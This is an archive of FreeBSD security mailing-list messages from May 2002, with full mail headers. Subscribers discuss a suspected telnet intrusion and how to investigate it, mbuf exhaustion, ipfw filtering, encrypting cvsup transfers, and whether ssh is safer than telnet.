The packages required are: daemontools-0.76_2 ezmlm-idx-0.40_1 qmail-1.03_1 ucspi-tcp-0.88 Cheezwhiz, Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 11: 2:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2AC5037B40C for ; Mon, 6 May 2002 11:02:16 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g46I2GG91600 for security@freebsd.org; Mon, 6 May 2002 11:02:16 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 6 May 2002 11:02:16 -0700 (PDT) Message-Id: <200205061802.g46I2GG91600@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 11:23:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A3FE637B400 for ; Mon, 6 May 2002 11:23:39 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g46INcU98140 for security@freebsd.org; Mon, 6 May 2002 11:23:38 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 6 May 2002 11:23:38 -0700 (PDT) Message-Id: <200205061823.g46INcU98140@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: 
security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports No matches to your query To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 12: 2: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from fed1mtao04.cox.net (fed1mtao04.cox.net [68.6.19.241]) by hub.freebsd.org (Postfix) with ESMTP id A4E3D37B401 for ; Mon, 6 May 2002 12:01:54 -0700 (PDT) Received: from ocnetworking.com ([68.4.231.87]) by fed1mtao04.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020506190155.BGTK26656.fed1mtao04.cox.net@ocnetworking.com> for ; Mon, 6 May 2002 15:01:55 -0400 Message-ID: <3CD6D3A2.1CC77A9B@ocnetworking.com> Date: Mon, 06 May 2002 12:04:02 -0700 From: "Dylan A. Reinhold" Organization: InterNetworking http://www.ocnetworking.com X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Telent Exploit Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think I just got hit with a telent exploit. 
I noticed some network activity on my cable modem, Logged in my gateway ran 'w' no one else but ran 'top' I had telned running, in my security logs I found this: May 5 16:27:45 cx17105-b /kernel: ipfw: 4000 Accept TCP 211.234.111.226:58981 68**.**.**:23 in via ep0 May 5 16:27:46 cx17105-b /kernel: ipfw: 4000 Accept TCP 211.234.111.226:59085 68.**.**.**:23 in via ep0 May 5 16:27:47 cx17105-b /kernel: ipfw: 4000 Accept TCP 211.234.111.226:59086 **.**.**:23 in via ep0 Im running stable what gives???? The worst part was I only had Telnet enabled for 3 hours.... $uname -a FreeBSD cx17105-b 4.5-STABLE FreeBSD 4.5-STABLE #2: Mon Apr 8 20:07:25 PDT 2002 root@cx17105-b:/usr/obj/usr/src/sys/SPUD i386 Thanks, Dylan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 12:38:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from ziplip.com (mail.ziplip.com [128.242.109.119]) by hub.freebsd.org (Postfix) with ESMTP id A349937B404 for ; Mon, 6 May 2002 12:38:15 -0700 (PDT) Received: from 10.1.0.21 (EHLO 10.1.0.21 10.1.0.21 [10.1.0.21] (may be forged)) by 10.1.0.21 with ESMTP id <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> for ; 06 May 2002 12:37:22 -0700 (PDT) Message-ID: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> Date: Mon, 6 May 2002 12:37:22 -0700 (PDT) From: SolarfluX Reply-To: solarflux@ziplip.com To: security@freebsd.org Subject: Re: Telnet Exploit Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-ZLPwdHint: X-ZLExpiry: -1 X-ZLReceiptConfirm: N X-ZLAuthType: WEB-MAIL X-ZLAuthOn: Y X-Mailer: ZipLip Sonoma v3.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Why in the world are you using telnetd anyhow? You should be using SSHD and never telnetd. 
Telnetd should be 'forbidden'... Did you log in from the internet to your gateway via telnet during that three hour period? Did you run tcpdump or ssldump (http://www.rtfm.com/ssldump/) to see where the traffic is coming from? Don't jump to conclusions before you acquire some data... -S > -----Original Message----- > From: Dylan A. Reinhold [mailto:Dylan@ocnetworking.com] > Sent: Monday, May 06, 2002, 12:04 PM > To: security@freebsd.org > Subject: Telent Exploit > > I think I just got hit with a telent exploit. I noticed some network > activity on my cable modem, Logged in my gateway ran 'w' no one else but > > ran 'top' I had telned running, in my security logs I found this: > > May 5 16:27:45 cx17105-b /kernel: ipfw: 4000 Accept TCP > 211.234.111.226:58981 68**.**.**:23 in via ep0 > May 5 16:27:46 cx17105-b /kernel: ipfw: 4000 Accept TCP > 211.234.111.226:59085 68.**.**.**:23 in via ep0 > May 5 16:27:47 cx17105-b /kernel: ipfw: 4000 Accept TCP > 211.234.111.226:59086 **.**.**:23 in via ep0 > > Im running stable what gives???? The worst part was I only had Telnet > enabled for 3 hours.... 
> > $uname -a > FreeBSD cx17105-b 4.5-STABLE FreeBSD 4.5-STABLE #2: Mon Apr 8 20:07:25 > PDT 2002 root@cx17105-b:/usr/obj/usr/src/sys/SPUD i386 > > Thanks, > Dylan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 12:46: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from patrocles.silby.com (d15.as28.nwbl0.wi.voyager.net [169.207.69.15]) by hub.freebsd.org (Postfix) with ESMTP id 438C937B403 for ; Mon, 6 May 2002 12:46:00 -0700 (PDT) Received: from patrocles.silby.com (localhost [127.0.0.1]) by patrocles.silby.com (8.12.3/8.12.3) with ESMTP id g46JksUm061500; Mon, 6 May 2002 14:46:54 -0500 (CDT) (envelope-from silby@silby.com) Received: from localhost (silby@localhost) by patrocles.silby.com (8.12.3/8.12.3/Submit) with ESMTP id g46JkcMc061497; Mon, 6 May 2002 14:46:54 -0500 (CDT) X-Authentication-Warning: patrocles.silby.com: silby owned process doing -bs Date: Mon, 6 May 2002 14:46:38 -0500 (CDT) From: Mike Silbersack To: admin Cc: freebsd-security@freebsd.org Subject: Re: 4.5 stable & tcpip fix maybe? In-Reply-To: Message-ID: <20020506144517.X60840-100000@patrocles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 6 May 2002, admin wrote: > Did any of the last src upgrades make a change that might cause me to get > this error... > > May 5 13:52:05 xXx /kernel: m_retry failed, consider increase mbuf value > May 5 13:52:05 xXx /kernel: m_retryhdr failed, consider increase mbuf > value There's probably no DoS going on here, you're just running out of mbufs clusters; run netstat -m to determine whether this is the case, then read tuning(7) to determine how to increase the number of mbufs allocated. 
Mike "Silby" Silbersack

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon May 6 12:52:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from balistraria.nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 3715A37B407 for ; Mon, 6 May 2002 12:52:02 -0700 (PDT) Received: (qmail 17300 invoked from network); 6 May 2002 19:51:56 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 6 May 2002 19:51:56 -0000 Content-Type: text/plain; charset="iso-8859-1" From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: security@freebsd.org Subject: Re: Telnet Exploit Date: Mon, 6 May 2002 13:47:54 -0600 X-Mailer: KMail [version 1.4] References: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> In-Reply-To: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205061347.54915.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On May 6, 2002 01:37 pm, SolarfluX wrote:
> Why in the world are you using telnetd anyhow? You should be using SSHD
> and never telnetd. Telnetd should be 'forbidden'...

So if we are going to do away with telnetd, we should scrap FTP and SMTP
then.. as they are garbage protocols.

We can not have that attitude. Why do you think FreeBSD still ships with
rlogin? To maintain backward compatibility with older systems.

> > I think I just got hit with a telnet exploit. I noticed some network
> > activity on my cable modem, Logged in my gateway ran 'w' no one else but
> >
> > ran 'top' I had telnetd running, in my security logs I found this:
> >
> > May 5 16:27:45 cx17105-b /kernel: ipfw: 4000 Accept TCP
> > 211.234.111.226:58981 68**.**.**:23 in via ep0
> > May 5 16:27:46 cx17105-b /kernel: ipfw: 4000 Accept TCP
> > 211.234.111.226:59085 68.**.**.**:23 in via ep0
> > May 5 16:27:47 cx17105-b /kernel: ipfw: 4000 Accept TCP
> > 211.234.111.226:59086 **.**.**:23 in via ep0
> >
> > I'm running stable what gives???? The worst part was I only had Telnet
> > enabled for 3 hours....
> >
> > $uname -a
> > FreeBSD cx17105-b 4.5-STABLE FreeBSD 4.5-STABLE #2: Mon Apr 8 20:07:25
> > PDT 2002 root@cx17105-b:/usr/obj/usr/src/sys/SPUD i386
> >
> > Thanks,
> > Dylan
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

If you are running 4.5-STABLE, you shouldn't have anything to worry about... those
logs look like the result of a "ipfw log allow tcp from any to any 23 setup"
or similar command. You are probably fine.

But if you are truly paranoid: Try running "sockstat" see if there is
anything bound to a socket that you did not put there. Check your firewall
(if you have one). Did you have any sort of filesystem integrity toolkit
installed like tripwire or aide? Try running that.. look in /tmp for rootkit
remains.. we need more information than messages/dmesg/etc.
Cya,
Dalin Owen

From owner-freebsd-security Mon May 6 13:19: 5 2002
Message-ID: <3CD6E531.9080108@tenebras.com>
Date: Mon, 06 May 2002 13:18:57 -0700
From: Michael Sierchio
Reply-To: kudzu@tenebras.com
To: kudzu@tenebras.com
Cc: Matthew Dillon, Nils Holland, Colin Faber, security@FreeBSD.ORG
Subject: Re: You've Been Removed!

Correction -- where I said 'qsecretary' I meant tmda, which is
generally available.
That it is written in Python makes me a little ill -- rage away ;-)

From owner-freebsd-security Mon May 6 13:25:32 2002
Date: Mon, 6 May 2002 13:25:03 -0700
From: Kris Kennaway
To: "Dylan A. Reinhold"
Cc: security@freebsd.org
Subject: Re: Telent Exploit
Message-ID: <20020506132502.D59402@xor.obsecurity.org>

On Mon, May 06, 2002 at 12:04:02PM -0700, Dylan A. Reinhold wrote:
> I think I just got hit with a telnet exploit.
I noticed some network
> activity on my cable modem, Logged in my gateway ran 'w' no one else but
>
> ran 'top' I had telnetd running, in my security logs I found this:
>
> May 5 16:27:45 cx17105-b /kernel: ipfw: 4000 Accept TCP
> 211.234.111.226:58981 68**.**.**:23 in via ep0
> May 5 16:27:46 cx17105-b /kernel: ipfw: 4000 Accept TCP
> 211.234.111.226:59085 68.**.**.**:23 in via ep0
> May 5 16:27:47 cx17105-b /kernel: ipfw: 4000 Accept TCP
> 211.234.111.226:59086 **.**.**:23 in via ep0
>
> I'm running stable what gives???? The worst part was I only had Telnet
> enabled for 3 hours....

Why do you think you were exploited? The above only shows people
connecting to the port. If you don't want people doing that, don't
allow them to.

Kris

From owner-freebsd-security Mon May 6 13:25:43 2002
Date: Mon, 6 May 2002 13:25:29 -0700 (PDT)
From: Matthew Dillon
Message-Id: <200205062025.g46KPTU60903@apollo.backplane.com>
To: Michael Sierchio
Cc: kudzu@tenebras.com, Nils Holland, Colin Faber, security@FreeBSD.ORG
Subject: Re: You've Been Removed!

:
:
:Correction -- where I said 'qsecretary' I meant tmda, which is
:generally available. That it is written in Python makes me a
:little ill -- rage away ;-)

    Heh. These are all good comments, people!

    -Matt
    Matthew Dillon

From owner-freebsd-security Mon May 6 13:32:26 2002
Date: Sun, 5 May 2002 02:10:16 -0700
From: Derrick John Klise
To: "William J. Borskey"
Cc: security@freebsd.org
Subject: Re: ipfw
Message-ID: <20020505021016.A84006@leaf.lumiere.net>

On Sat, May 04, 2002 at 08:36:52PM -0700, William J. Borskey wrote:
>
> is it possible to write rules for ipfw using ethernet addresses instead of
> ip addresses?
>

I haven't used it, and I'm not sure it's stable, but:

http://www.bsdshell.net/hut_ethfw.html

is a possibility if you want to do ethernet-based filtering.

--
Derrick John Klise
"I went into a general store, and they wouldn't sell me anything specific".
    -- Steven Wright

From owner-freebsd-security Mon May 6 14: 2:28 2002
Message-Id: <200205062102.RAA22182@koibito.iisc.com>
To: security@FreeBSD.ORG
Subject: Re: Telnet Exploit
Date: Mon, 06 May 2002 17:02:20 -0400
From: "Charles M. Richmond"

> > May 5 16:27:45 cx17105-b /kernel: ipfw: 4000 Accept TCP
> > 211.234.111.226:58981 68**.**.**:23 in via ep0
> > May 5 16:27:46 cx17105-b /kernel: ipfw: 4000 Accept TCP
> > 211.234.111.226:59085 68.**.**.**:23 in via ep0
> > May 5 16:27:47 cx17105-b /kernel: ipfw: 4000 Accept TCP
> > 211.234.111.226:59086 **.**.**:23 in via ep0
> >
> > I'm running stable what gives???? The worst part was I only had Telnet
> > enabled for 3 hours....

> Why do you think you were exploited? The above only shows people
> connecting to the port. If you don't want people doing that, don't
> allow them to.

Maybe he was and maybe he wasn't exploited, but 211.234.xxx.xxx is a
block of addresses in Korea that are used by so many spammers that we
block out the entire range. It is likely that someone was looking for
a machine to hijack for spam generation.

Charles

***********************************************************************
* Charles Richmond Integrated International Systems Corporation *
* cmr@iisc.com cmr@acm.org cmr@shore.net http://www.iisc.com *
* UNIX Internals, I18N, L10N, X, Realtime Imaging, and Custom S/W *
* 131 Bishop's Forest Drive , Waltham , Ma. USA 02452 *
* (781) 647 2269 FAX (781) 647 3665 Cellular (781) 389 9777 *
***********************************************************************

From owner-freebsd-security Mon May 6 14: 3:39 2002
Message-Id: <200205062103.g46L39R3024026@borja.sarenet.es>
From: Borja Marcos
To: solarflux@ziplip.com
Subject: Re: Telnet Exploit
Date: Mon, 6 May 2002 23:03:09 +0200
Cc: security@freebsd.org

On Monday 06 May 2002 21:37, you wrote:
> Why in the world are you using
telnetd anyhow? You should be using SSHD
> and never telnetd. Telnetd should be 'forbidden'...

    Why? Do you think ssh is more secure? It may not be. Just think about the
complexity of ssh. It has been hit by a bug in zlib, for example. Or has zlib
had an audit as strict as ssh?

    Telnet has its problems, but we should not say that ssh is "more secure"
acritically. It is obvious that it has advantages, however.

    Borja.

From owner-freebsd-security Mon May 6 14: 6:47 2002
Date: Mon, 6 May 2002 14:05:48 -0700 (PDT)
From: SolarfluX
Reply-To: solarflux@ziplip.com
To: security@freebsd.org
Subject: cvsup/install over ssh?

Why doesn't cvsup have the option to be encrypted via ssh like anoncvs does?

How about an option to install over an encrypted connection?

Would anyone consider implementing either of these suggestions?

From owner-freebsd-security Mon May 6 14:16: 6 2002
Date: Mon, 6 May 2002 16:12:03 -0500 (CDT)
From: admin
To: Mike Silbersack
Cc: freebsd-security@freebsd.org
Subject: Re: 4.5 stable & tcpip fix maybe?

thanks, I do know about changing the mbuf, but finding out what was going
on was of more interest...didn't think about -m, unfortunately - this only
happens when I'm NOT around..so a bit hard to catch it actually happening.

On Mon, 6 May 2002, Mike Silbersack wrote:

>
> On Mon, 6 May 2002, admin wrote:
>
> > Did any of the last src upgrades make a change that might cause me to get
> > this error...
> >
> > May 5 13:52:05 xXx /kernel: m_retry failed, consider increase mbuf value
> > May 5 13:52:05 xXx /kernel: m_retryhdr failed, consider increase mbuf
> > value
>
> There's probably no DoS going on here, you're just running out of mbufs
> clusters; run netstat -m to determine whether this is the case, then read
> tuning(7) to determine how to increase the number of mbufs allocated.
>
> Mike "Silby" Silbersack
>

From owner-freebsd-security Mon May 6 14:16:44 2002
Date: Mon, 6 May 2002 23:16:34 +0200
From: Miguel Mendez
To: SolarfluX
Cc: security@freebsd.org
Subject: Re: cvsup/install over ssh?
Message-ID: <20020506231634.A33284@energyhq.homeip.net>

On Mon, May 06, 2002 at 02:05:48PM -0700, SolarfluX wrote:

Hi,

> Why doesn't cvsup have the option to be encrypted via ssh like anoncvs does?

IMHO nonsense, no sensitive data is exchanged between client and server.

> How about an option to install over an encrypted connection?

Let me be the first to say: "Where are your patches?" (TM) :)

> Would anyone consider implementing either of these suggestions?

Hmmkay, let me get this straight, you want to encrypt an anon ftp
session? And the purpose would be? It's publicly available data you are
transferring to your box, why in the world would you want to encrypt it?

Cheers,
--
Miguel Mendez - flynn@energyhq.homeip.net
GPG Public Key :: http://energyhq.homeip.net/files/pubkey.txt
EnergyHQ :: http://www.energyhq.tk
FreeBSD - The power to serve!

From owner-freebsd-security Mon May 6 14:19:33 2002
Date: Mon, 6 May 2002 14:19:22 -0700 (PDT)
From: Doug Barton
To: Miguel Mendez
Cc: SolarfluX,
Subject: Re: cvsup/install over ssh?
Message-ID: <20020506141901.W13051-100000@zoot.corp.yahoo.com>

On Mon, 6 May 2002, Miguel Mendez wrote:

> On Mon, May 06, 2002 at 02:05:48PM -0700, SolarfluX wrote:
>
> Hi,
>
> > Why doesn't cvsup have the option to be encrypted via ssh like anoncvs does?
>
> IMHO nonsense, no sensitive data is exchanged between client and server.

Maybe not in your world, but don't make the mistake of
over-generalizing. :)

--
"We have known freedom's price. We have shown freedom's power.
And in this great conflict, ... we will see freedom's victory."
- George W. Bush, President of the United States
State of the Union, January 28, 2002

From owner-freebsd-security Mon May 6 14:29:10 2002
Date: Mon, 6 May 2002 17:27:02 -0400 (EDT)
From: Matt Piechota
To: Miguel Mendez
Cc: SolarfluX,
Subject: Re: cvsup/install over ssh?
Message-ID: <20020506172523.K71568-100000@cithaeron.argolis.org>

On Mon, 6 May 2002, Miguel Mendez wrote:

> Hmmkay, let me get this straight, you want to encrypt an anon ftp
> session? And the purpose would be? It's publicly available data you are
> transferring to your box, why in the world would you want to encrypt it?

I suppose that someone could be watching your ftp traffic, and know you've
installed FreeBSD.
Then, no matter how much you obfuscate what your OS
looks like, they'll know it might be FreeBSD. :)

--
Matt Piechota

From owner-freebsd-security Mon May 6 14:33: 4 2002
Date: Mon, 6 May 2002 23:33:01 +0200
From: Miguel Mendez
To: Matt Piechota
Cc: SolarfluX, security@FreeBSD.ORG
Subject: Re: cvsup/install over ssh?
Message-ID: <20020506233301.A33672@energyhq.homeip.net>

On Mon, May 06, 2002 at 05:27:02PM -0400, Matt Piechota wrote:

Hi,

> I suppose that someone could be watching your ftp traffic, and know you've
> installed FreeBSD. Then, no matter how much you obfuscate what your OS
> looks like, they'll know it might be FreeBSD.
:)

If you are *that* paranoid you can buy the CD set :-)

Cheers,
--
Miguel Mendez - flynn@energyhq.homeip.net
GPG Public Key :: http://energyhq.homeip.net/files/pubkey.txt
EnergyHQ :: http://www.energyhq.tk
FreeBSD - The power to serve!

From owner-freebsd-security Mon May 6 14:34:13 2002
Message-ID: <004801c1f54d$cf821420$658ce650@noused>
From: "Retal"
Subject: Re: cvsup/install over ssh?
Date: Tue, 7 May 2002 00:31:37 +0200

believe me, if someone wanna know whats ur OS..
he will know with or without encrypt..
and one other thing.. if you are secured enough, who cares..

retal (retal@retal.co.il)

----- Original Message -----
From: "Matt Piechota"
To: "Miguel Mendez"
Cc: "SolarfluX" ;
Sent: Monday, May 06, 2002 11:27 PM
Subject: Re: cvsup/install over ssh?

> On Mon, 6 May 2002, Miguel Mendez wrote:
>
> > Hmmkay, let me get this straight, you want to encrypt an anon ftp
> > session? And the purpose would be? It's publicly available data you are
> > transferring to your box, why in the world would you want to encrypt it?
>
> I suppose that someone could be watching your ftp traffic, and know you've
> installed FreeBSD. Then, no matter how much you obfuscate what your OS
> looks like, they'll know it might be FreeBSD. :)
>
> --
> Matt Piechota

From owner-freebsd-security Mon May 6 14:36:13 2002
Date: Mon, 6 May 2002 17:35:53 -0400
From: "Peter C. Lai"
To: Matt Piechota
Cc: Miguel Mendez, SolarfluX, security@FreeBSD.ORG
Subject: Re: cvsup/install over ssh?
Message-ID: <20020506173553.A15713@cowbert.2y.net>
Reply-To: peter.lai@uconn.edu

On Mon, May 06, 2002 at 05:27:02PM -0400, Matt Piechota wrote:
> On Mon, 6 May 2002, Miguel Mendez wrote:
>
> > Hmmkay, let me get this straight, you want to encrypt an anon ftp
> > session? And the purpose would be? It's publicly available data you are
> > transferring to your box, why in the world would you want to encrypt it?
>
> I suppose that someone could be watching your ftp traffic, and know you've
> installed FreeBSD. Then, no matter how much you obfuscate what your OS
> looks like, they'll know it might be FreeBSD. :)
>

I'd rather advertise my box as FreeBSD and not Linux. Tends to
limit the amount of people trying to crack the box using stuff
like old RPC hacks :)

> --
> Matt Piechota

--
Peter C. Lai
University of Connecticut
Dept.
of Molecular and Cell Biology | Undergraduate Research Assistant
http://cowbert.2y.net/

From owner-freebsd-security Mon May 6 14:56:33 2002
Message-Id: <5.1.0.14.0.20020506165140.04f536b0@pop3s.schulte.org>
Date: Mon, 06 May 2002 16:54:18 -0500
To: peter.lai@uconn.edu, Matt Piechota
From: Christopher Schulte
Subject: Re: cvsup/install over ssh?
Cc: Miguel Mendez, SolarfluX, security@FreeBSD.ORG

At 05:35 PM 5/6/2002 -0400, Peter C. Lai wrote:
>I'd rather advertise my box as FreeBSD and not Linux. Tends to
>limit the amount of people trying to crack the box using stuff
>like old RPC hacks :)

I disagree.
My FreeBSD systems saw lots and lots of rpc and other 'linux
like' exploitation scans before I just filtered most ports at my
firewall. Don't rely on the sophistication of a kiddie's script as a
security paradigm.

>--
>Peter C. Lai
>University of Connecticut
>Dept. of Molecular and Cell Biology | Undergraduate Research Assistant
>http://cowbert.2y.net/

--
Christopher Schulte
http://www.schulte.org/
Do not un-munge my @nospam.schulte.org
email address. This address is valid.

From owner-freebsd-security Mon May 6 15: 1:11 2002
Date: Mon, 6 May 2002 15:01:03 -0700 (PDT)
From: Jason Stone
Subject: Re: cvsup/install over ssh?
Message-ID: <20020506144118.D6630-100000@walter>

> > Why doesn't cvsup have the option to be encrypted via ssh like
> anoncvs does?
>
> IMHO nonsense, no sensitive data is exchanged between client and
> server.

> Hmmkay, let me get this straight, you want to encrypt an anon ftp
> session? And the purpose would be?

1) Encryption provides more than privacy - it also provides authenticity.
Other package management systems (eg, rpm, dpkg) allow for pgp-signing
each binary package.
Using ssl certs to set up the connection to the
cvsup server would provide similar authenticity functionality to
cvsup'ed source upgrades. Note that if you're worried about burning too
much cpu, it would be sufficient to use the equivalent of ssh v2 with a
null cipher - ie, to just do per-packet MAC'ing and not actually encrypt
the packet payloads.

2) People use cvsup for more than just freebsd sources - it's a generally
useful tool. I was using cvsup as part of website publication some time
ago - I just proxied it over a stunnel and it worked okay.

Maybe we can run cvsup behind a stunnel on one of the official cvsup
mirrors?

-Jason

-----------------------------------------------------------------------
I worry about my child and the Internet all the time, even though she's
too young to have logged on yet. Here's what I worry about. I worry
that 10 or 15 years from now, she will come to me and say "Daddy, where
were you when they took freedom of the press away from the Internet?"
-- Mike Godwin

From owner-freebsd-security Mon May 6 16: 2:31 2002
From: "William J.
Borskey" To: derrick@lumiere.net Cc: security@freebsd.org Subject: ethfw Date: Mon, 06 May 2002 16:02:27 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 06 May 2002 23:02:28.0125 (UTC) FILETIME=[17F6ACD0:01C1F552] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org am i supposed to use ethfw with ipfw, because ethfw looks very limited. _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 16: 8:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from fed1mtao04.cox.net (fed1mtao04.cox.net [68.6.19.241]) by hub.freebsd.org (Postfix) with ESMTP id 3AB6237B404 for ; Mon, 6 May 2002 16:08:53 -0700 (PDT) Received: from ocnetworking.com ([68.4.231.87]) by fed1mtao04.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020506230853.ELUI26656.fed1mtao04.cox.net@ocnetworking.com> for ; Mon, 6 May 2002 19:08:53 -0400 Message-ID: <3CD70D86.872C3337@ocnetworking.com> Date: Mon, 06 May 2002 16:11:02 -0700 From: "Dylan A. 
Reinhold" Organization: InterNetworking http://www.ocnetworking.com X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Re: Telent Exploit References: <3CD6D3A2.1CC77A9B@ocnetworking.com> <20020506132502.D59402@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Kris Kennaway wrote: > On Mon, May 06, 2002 at 12:04:02PM -0700, Dylan A. Reinhold wrote: > > I think I just got hit with a telnet exploit. I noticed some network > > activity on my cable modem, Logged in my gateway ran 'w' no one else but > >-------------SNIP ---------------SNIP----------------->>>>>>>>>>>>>>> > > > I'm running stable what gives???? The worst part was I only had Telnet > > enabled for 3 hours.... > > Why do you think you were exploited? The above only shows people > connecting to the port. If you don't want people doing that, don't > allow them to. > > Kris When I saw the network activity and ran top, 'telnetd' was running something like 18% of the CPU with no visible users from 'who'. So I killed the telnetd pid, and all the traffic stopped. Then I looked at the security log; the last entry was 15 minutes from when I killed 'telnetd'. 
Thanks, Dylan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 16:23:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from ziplip.com (mail.ziplip.com [128.242.109.119]) by hub.freebsd.org (Postfix) with ESMTP id 7ED0637B404 for ; Mon, 6 May 2002 16:23:39 -0700 (PDT) Received: from 10.1.0.21 (EHLO 10.1.0.21 10.1.0.21 [10.1.0.21] (may be forged)) by 10.1.0.21 with ESMTP id for ; 06 May 2002 16:22:46 -0700 (PDT) Message-ID: Date: Mon, 6 May 2002 16:22:46 -0700 (PDT) From: SolarfluX Reply-To: solarflux@ziplip.com To: security@freebsd.org Subject: Re: Telnet Exploit Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-ZLPwdHint: X-ZLExpiry: -1 X-ZLReceiptConfirm: N X-ZLAuthType: WEB-MAIL X-ZLAuthOn: Y X-Mailer: ZipLip Sonoma v3.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > On Monday 06 May 2002 21:37, I wrote: > > Why in the world are you using telnetd anyhow? You should be using SSHD > > and never telnetd. Telnetd should be 'forbidden'... > Borja wrote: > Why? Do you think ssh is more secure? It may not be. Just think about the > complexity of ssh. It has been hit by a bug in zlib, for example. Or has zlib > had an audit as strict as ssh? > > Telnet has its problems, but we should not say that ssh is "more secure" > acritically. It is obvious that it has advantages, however. Are you for real? Have you ever sniffed a connection between two machines using ssldump? When looking at a telnet or ftp connection, it shows everything, clear as day. At least with ssh, you'd need the key or have to know how to exploit/crack it, which is MUCH harder to do than root a node somewhere along the path and sniff. 
